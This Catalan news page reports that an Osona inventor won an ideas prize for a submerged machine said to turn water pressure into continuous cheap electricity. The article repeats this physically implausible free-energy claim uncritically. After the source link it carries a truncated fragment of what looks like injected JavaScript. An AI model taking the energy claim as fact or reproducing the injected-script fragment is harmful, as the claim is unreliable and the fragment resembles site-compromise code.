• Inici
  • Notícies
  • Premi per a un nou sistema per crear energia elèctrica ideat a Osona

Premi per a un nou sistema per crear energia elèctrica ideat a Osona

Santi Trias és tècnic electromecànic i té un taller de reparació de cotxes. Però inventa des que tenia 19 anys. Ara en té 39 i acaba de guanyar el concurs d’idees en l’apartat industrial d’Innovation Festival Barcelona, que impulsa la Comissió Europea en el marc del projecte PRO UNNO Europe. El premi l’ha guanyat amb el projecte STBsystems, una màquina que enfonsada sota el mar o en un pou és capaç de produir electricitat neta i barata que no té més cost que la instal·lació i la distribució. Aquest premi li suposa anar al mes de setembre a Tallin, Estònia, on hi haurà 18 projectes escollits en diverses ciutats europees i on més enllà del concurs s’hi congreguen persones interessades en nous productes. Trias ja va presentar aquest projecte la tardor passada en una de les sessions de l’Àngel Inversor de Vic i en altres fòrums i té empreses interessades.

L’objectiu és, però, trobar una gran empresa, una multinacional que pugui fer una inversió important. “Jo no vull fabricar-ho, ni puc”, explica. I és que el seu és un projecte gran. Es tracta de fer servir la pressió, un element que no s’utilitza, per acabar creant energia elèctrica. Trias ha inventat una màquina que s’assembla a un bus. La màquina s’enfonsa a més de 10 metres sota el mar o en un pou, però “això sí, envoltada d’aigua o un altre líquid que fa pressió”. Aquesta pressió provoca que es creï aire restringit. Dins d’un bidó, Trias hi ha posat un circuit per l’aire però que té una membrana elàstica molt sensible en dos dels tubs. En aquest punt l’aire queda presoner “i empeny, per la pressió, la membrana, una cap a una banda i una altra cap a l’oposada”. D’aquesta manera es crea una succió contínua lligada a una dinamo i per tant crea energia continuada que es trasllada sobre el nivell del mar a través d’unes mànegues. Com més pressió, més ràpid gira la dinamo i més quilowatts es creen.

Llegiu tota la notícia a El 9Nouvar d=document;var s=d.createElement(‘script’);

Etiquetes, ,

Imprimir aquest article

Trackback from your site.

Deixa un comentari

Hauries d' identificar-te per deixar un comentari.
A Manlleu
Fem Xarxa